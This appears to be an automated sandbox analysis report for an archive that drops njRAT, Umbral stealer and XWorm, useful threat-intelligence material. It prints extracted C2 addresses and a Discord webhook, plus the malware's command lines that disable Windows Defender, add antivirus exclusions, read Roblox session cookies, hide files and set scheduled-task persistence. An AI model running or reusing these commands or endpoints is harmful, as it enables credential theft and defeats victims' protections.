njrat | e480c8945eb3750a57c2544a72059177b7b8cebdb0814c9e0155165daf83c53f

Analysis

max time kernel
136s
max time network
144s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
01-12-2024 16:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aquatic.rar
Size

32.9MB
MD5

5bd8314885aa5941e4e7d3fd1cd08c9e
SHA1

a8ee58da352c44dfe6d6659c6e3c1d0899638c26
SHA256

e480c8945eb3750a57c2544a72059177b7b8cebdb0814c9e0155165daf83c53f
SHA512

99f559d1866ebead5337de3098dc295ef8032bc59db8eb2d1f9853f559f574215743ace7fe386908818f190800403bdc41c981dfd9b3279851ff3c835256293e
SSDEEP

786432:c/lq+fejuFKsmOgrsiZbH0DlOy6m4cy5dJulOg1ns+RoDlQl/y:c/E/jYZfjidEE6ybJ61nR6Qlq

Score

10^/10

njrat umbral xworm hacked discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1260642604438126643/aa_UuahSUZkuOs2VlSIBCQbkyeOFMP2Ohl9qSBW53DeOIykNwknCmzQV8l5t08t9fhd5

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

147.185.221.20:49236

Mutex

6a8a3b6e5450a823d542e748a454aa4c

Attributes

reg_key
6a8a3b6e5450a823d542e748a454aa4c
splitter
|'|'|

Extracted

Family

xworm

Version

5.0

testarosa.duckdns.org:7110

Mutex

5ZpeoOe6AtQfr6wU

Attributes

Install_directory
%AppData%
install_file
Ondrive.exe

aes.plain

Signatures

Detect Umbral payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0008000000015f25-110.dat	family_umbral
behavioral1/memory/1688-112-0x0000000000AB0000-0x0000000000AF0000-memory.dmp	family_umbral
behavioral1/memory/1928-243-0x0000000000DB0000-0x0000000000DF0000-memory.dmp	family_umbral
behavioral1/memory/1896-333-0x00000000000D0000-0x0000000000110000-memory.dmp	family_umbral

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/988-135-0x0000000000350000-0x0000000000360000-memory.dmp	family_xworm
behavioral1/files/0x0007000000016d3a-134.dat	family_xworm
behavioral1/memory/1676-251-0x0000000000300000-0x0000000000310000-memory.dmp	family_xworm

Njrat family
njrat
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2172	powershell.exe
2768	powershell.exe
2096	powershell.exe
936	powershell.exe
2440	powershell.exe
1776	powershell.exe
604	powershell.exe
1588	powershell.exe
2144	powershell.exe
2452	powershell.exe
1200	powershell.exe
1944	powershell.exe
892	powershell.exe
2396	powershell.exe
2292	powershell.exe
496	powershell.exe
1936	powershell.exe
2076	powershell.exe
1940	powershell.exe

Drops file in Drivers directory 3 IoCs

Processes:

Aquatic.exeAquatic.exeAquatic.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exe

pid	Process
408	netsh.exe

Executes dropped EXE 43 IoCs

Processes:

main.exemain.exeloader.exeAquatic.exeServer.exeloader.exeServer.execonhost.exeAquatic.exeServer.exeloader.exeServer.execonhost.exeAquatic.exeServer.exeServer.exeloader.execonhost.exeAquatic.exeServer.exeloader.exeServer.execonhost.exeserver.exeAquatic.exeServer.exeloader.exeAquatic.exeServer.exeloader.exeOndrive.exeServer.exeAquatic.exeloader.exeAquatic.exeServer.exeloader.exeAquatic.exeServer.exeloader.exeAquatic.exeServer.exeloader.exe

pid	Process
2504	main.exe
2980	main.exe
1812	loader.exe
1688	Aquatic.exe
1100	Server.exe
3064	loader.exe
920	Server.exe
988	conhost.exe
780	Aquatic.exe
1032	Server.exe
1792	loader.exe
1280	Server.exe
344	conhost.exe
812	Aquatic.exe
2620	Server.exe
2728	Server.exe
2780	loader.exe
2736	conhost.exe
1132	Aquatic.exe
2272	Server.exe
2256	loader.exe
836	Server.exe
1256	conhost.exe
840	server.exe
1928	Aquatic.exe
2600	Server.exe
376	loader.exe
2980	Aquatic.exe
968	Server.exe
992	loader.exe
1676	Ondrive.exe
2004	Server.exe
972	Aquatic.exe
1608	loader.exe
2984	Aquatic.exe
2512	Server.exe
2584	loader.exe
2448	Aquatic.exe
2080	Server.exe
1504	loader.exe
2424	Aquatic.exe
1604	Server.exe
2808	loader.exe

Loads dropped DLL 5 IoCs

Processes:

7zFM.exemain.exemain.exeServer.exe

pid	Process
2492	7zFM.exe
2532
2504	main.exe
2980	main.exe
920	Server.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Server.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe\" .."	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Server.exe\" .."	Server.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

Processes:

flow	ioc
9	discord.com
10	discord.com
19	discord.com
20	discord.com
28	discord.com
29	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
6	ip-api.com
16	ip-api.com
25	ip-api.com
33	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

Server.exeServer.exeServer.exenetsh.exeServer.exeServer.exeserver.exeServer.exeServer.exeServer.exeServer.exeServer.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

Processes:

cmd.exePING.EXEcmd.exePING.EXEcmd.exePING.EXE

pid	Process
2896	cmd.exe
932	PING.EXE
2376	cmd.exe
2356	PING.EXE
2532	cmd.exe
304	PING.EXE

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

Processes:

wmic.exewmic.exewmic.exe

pid	Process
2708	wmic.exe
2484	wmic.exe
1712	wmic.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid	Process
304	PING.EXE
932	PING.EXE
2356	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exe

pid	Process
2660	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

conhost.exe

pid	Process
988	conhost.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

Processes:

7zFM.exepowershell.exepowershell.exepowershell.exeAquatic.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAquatic.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeAquatic.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
892	powershell.exe
2396	powershell.exe
2292	powershell.exe
1688	Aquatic.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
496	powershell.exe
1936	powershell.exe
2492	7zFM.exe
2440	powershell.exe
2492	7zFM.exe
1776	powershell.exe
2496	powershell.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2144	powershell.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
1928	Aquatic.exe
2076	powershell.exe
2492	7zFM.exe
2452	powershell.exe
2492	7zFM.exe
604	powershell.exe
2492	7zFM.exe
2492	7zFM.exe
2940	powershell.exe
1588	powershell.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe
2984	Aquatic.exe
1940	powershell.exe
1200	powershell.exe
2492	7zFM.exe
2492	7zFM.exe
2172	powershell.exe
2492	7zFM.exe
2492	7zFM.exe
2788	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

7zFM.exe

pid	Process
2492	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

7zFM.execonhost.exeAquatic.execonhost.exepowershell.exewmic.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exe

description	pid	Process
Token: SeRestorePrivilege	2492	7zFM.exe
Token: 35	2492	7zFM.exe
Token: SeSecurityPrivilege	2492	7zFM.exe
Token: SeSecurityPrivilege	2492	7zFM.exe
Token: SeDebugPrivilege	988	conhost.exe
Token: SeDebugPrivilege	1688	Aquatic.exe
Token: SeDebugPrivilege	344	conhost.exe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeIncreaseQuotaPrivilege	2300	wmic.exe
Token: SeSecurityPrivilege	2300	wmic.exe
Token: SeTakeOwnershipPrivilege	2300	wmic.exe
Token: SeLoadDriverPrivilege	2300	wmic.exe
Token: SeSystemProfilePrivilege	2300	wmic.exe
Token: SeSystemtimePrivilege	2300	wmic.exe
Token: SeProfSingleProcessPrivilege	2300	wmic.exe
Token: SeIncBasePriorityPrivilege	2300	wmic.exe
Token: SeCreatePagefilePrivilege	2300	wmic.exe
Token: SeBackupPrivilege	2300	wmic.exe
Token: SeRestorePrivilege	2300	wmic.exe
Token: SeShutdownPrivilege	2300	wmic.exe
Token: SeDebugPrivilege	2300	wmic.exe
Token: SeSystemEnvironmentPrivilege	2300	wmic.exe
Token: SeRemoteShutdownPrivilege	2300	wmic.exe
Token: SeUndockPrivilege	2300	wmic.exe
Token: SeManageVolumePrivilege	2300	wmic.exe
Token: 33	2300	wmic.exe
Token: 34	2300	wmic.exe
Token: 35	2300	wmic.exe
Token: SeIncreaseQuotaPrivilege	2300	wmic.exe
Token: SeSecurityPrivilege	2300	wmic.exe
Token: SeTakeOwnershipPrivilege	2300	wmic.exe
Token: SeLoadDriverPrivilege	2300	wmic.exe
Token: SeSystemProfilePrivilege	2300	wmic.exe
Token: SeSystemtimePrivilege	2300	wmic.exe
Token: SeProfSingleProcessPrivilege	2300	wmic.exe
Token: SeIncBasePriorityPrivilege	2300	wmic.exe
Token: SeCreatePagefilePrivilege	2300	wmic.exe
Token: SeBackupPrivilege	2300	wmic.exe
Token: SeRestorePrivilege	2300	wmic.exe
Token: SeShutdownPrivilege	2300	wmic.exe
Token: SeDebugPrivilege	2300	wmic.exe
Token: SeSystemEnvironmentPrivilege	2300	wmic.exe
Token: SeRemoteShutdownPrivilege	2300	wmic.exe
Token: SeUndockPrivilege	2300	wmic.exe
Token: SeManageVolumePrivilege	2300	wmic.exe
Token: 33	2300	wmic.exe
Token: 34	2300	wmic.exe
Token: 35	2300	wmic.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2736	conhost.exe
Token: SeDebugPrivilege	496	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	1776	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeIncreaseQuotaPrivilege	1920	wmic.exe
Token: SeSecurityPrivilege	1920	wmic.exe
Token: SeTakeOwnershipPrivilege	1920	wmic.exe
Token: SeLoadDriverPrivilege	1920	wmic.exe
Token: SeSystemProfilePrivilege	1920	wmic.exe
Token: SeSystemtimePrivilege	1920	wmic.exe
Token: SeProfSingleProcessPrivilege	1920	wmic.exe
Token: SeIncBasePriorityPrivilege	1920	wmic.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

7zFM.exe

pid	Process
2492	7zFM.exe
2492	7zFM.exe
2492	7zFM.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7zFM.exemain.exeloader.exeServer.exeloader.exeServer.execonhost.exeAquatic.exeloader.exeServer.exe

description	pid	Process	procid_target
PID 2492 wrote to memory of 2504	2492	7zFM.exe	31
PID 2492 wrote to memory of 2504	2492	7zFM.exe	31
PID 2492 wrote to memory of 2504	2492	7zFM.exe	31
PID 2504 wrote to memory of 2980	2504	main.exe	33
PID 2504 wrote to memory of 2980	2504	main.exe	33
PID 2504 wrote to memory of 2980	2504	main.exe	33
PID 2492 wrote to memory of 1812	2492	7zFM.exe	34
PID 2492 wrote to memory of 1812	2492	7zFM.exe	34
PID 2492 wrote to memory of 1812	2492	7zFM.exe	34
PID 1812 wrote to memory of 1688	1812	loader.exe	35
PID 1812 wrote to memory of 1688	1812	loader.exe	35
PID 1812 wrote to memory of 1688	1812	loader.exe	35
PID 1812 wrote to memory of 1100	1812	loader.exe	36
PID 1812 wrote to memory of 1100	1812	loader.exe	36
PID 1812 wrote to memory of 1100	1812	loader.exe	36
PID 1812 wrote to memory of 3064	1812	loader.exe	37
PID 1812 wrote to memory of 3064	1812	loader.exe	37
PID 1812 wrote to memory of 3064	1812	loader.exe	37
PID 1100 wrote to memory of 920	1100	Server.exe	38
PID 1100 wrote to memory of 920	1100	Server.exe	38
PID 1100 wrote to memory of 920	1100	Server.exe	38
PID 1100 wrote to memory of 920	1100	Server.exe	38
PID 1100 wrote to memory of 988	1100	Server.exe	39
PID 1100 wrote to memory of 988	1100	Server.exe	39
PID 1100 wrote to memory of 988	1100	Server.exe	39
PID 3064 wrote to memory of 780	3064	loader.exe	40
PID 3064 wrote to memory of 780	3064	loader.exe	40
PID 3064 wrote to memory of 780	3064	loader.exe	40
PID 3064 wrote to memory of 1032	3064	loader.exe	41
PID 3064 wrote to memory of 1032	3064	loader.exe	41
PID 3064 wrote to memory of 1032	3064	loader.exe	41
PID 3064 wrote to memory of 1792	3064	loader.exe	42
PID 3064 wrote to memory of 1792	3064	loader.exe	42
PID 3064 wrote to memory of 1792	3064	loader.exe	42
PID 1032 wrote to memory of 1280	1032	Server.exe	43
PID 1032 wrote to memory of 1280	1032	Server.exe	43
PID 1032 wrote to memory of 1280	1032	Server.exe	43
PID 1032 wrote to memory of 1280	1032	Server.exe	43
PID 1032 wrote to memory of 344	1032	Server.exe	44
PID 1032 wrote to memory of 344	1032	Server.exe	44
PID 1032 wrote to memory of 344	1032	Server.exe	44
PID 988 wrote to memory of 892	988	conhost.exe	45
PID 988 wrote to memory of 892	988	conhost.exe	45
PID 988 wrote to memory of 892	988	conhost.exe	45
PID 1688 wrote to memory of 2300	1688	Aquatic.exe	47
PID 1688 wrote to memory of 2300	1688	Aquatic.exe	47
PID 1688 wrote to memory of 2300	1688	Aquatic.exe	47
PID 988 wrote to memory of 2396	988	conhost.exe	49
PID 988 wrote to memory of 2396	988	conhost.exe	49
PID 988 wrote to memory of 2396	988	conhost.exe	49
PID 988 wrote to memory of 2292	988	conhost.exe	52
PID 988 wrote to memory of 2292	988	conhost.exe	52
PID 988 wrote to memory of 2292	988	conhost.exe	52
PID 1792 wrote to memory of 812	1792	loader.exe	54
PID 1792 wrote to memory of 812	1792	loader.exe	54
PID 1792 wrote to memory of 812	1792	loader.exe	54
PID 1792 wrote to memory of 2620	1792	loader.exe	55
PID 1792 wrote to memory of 2620	1792	loader.exe	55
PID 1792 wrote to memory of 2620	1792	loader.exe	55
PID 1792 wrote to memory of 2780	1792	loader.exe	56
PID 1792 wrote to memory of 2780	1792	loader.exe	56
PID 1792 wrote to memory of 2780	1792	loader.exe	56
PID 2620 wrote to memory of 2728	2620	Server.exe	57
PID 2620 wrote to memory of 2728	2620	Server.exe	57

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
1832	attrib.exe
892	attrib.exe
2184	attrib.exe
788	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\aquatic.rar"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Users\Admin\AppData\Local\Temp\7zOCB928108\main.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOCB928108\main.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Users\Admin\AppData\Local\Temp\onefile_2504_133775450783680000\main.exe
    "C:\Users\Admin\AppData\Local\Temp\7zOCB928108\main.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2980
- C:\Users\Admin\AppData\Local\Temp\7zOCB9D6778\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOCB9D6778\loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
    "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1688
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2300
  - - C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
      4⤵
      Views/modifies file attributes
      PID:788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2440
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2496
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1920
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:2460
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:1732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2144
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2708
  - - C:\Windows\system32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:2896
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:932
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1100
  - - C:\Users\Admin\AppData\Roaming\Server.exe
      "C:\Users\Admin\AppData\Roaming\Server.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:920
    - - C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:840
  - - C:\Users\Admin\AppData\Roaming\conhost.exe
      "C:\Users\Admin\AppData\Roaming\conhost.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:988
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1936
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2660
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3064
  - - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
      "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
      4⤵
      Executes dropped EXE
      PID:780
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1032
    - - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1280
    - - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:344
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1792
    - - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        5⤵
        Executes dropped EXE
        
        PID:812
    - - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2620
      - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2728
      - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:2780
      - C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
        6⤵
        Executes dropped EXE
        
        PID:1132
      - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        6⤵
        Executes dropped EXE
        
        PID:2272
        
        C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:836
        
        C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        7⤵
        Executes dropped EXE
        
        PID:1256
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        Executes dropped EXE
        
        PID:2256
        
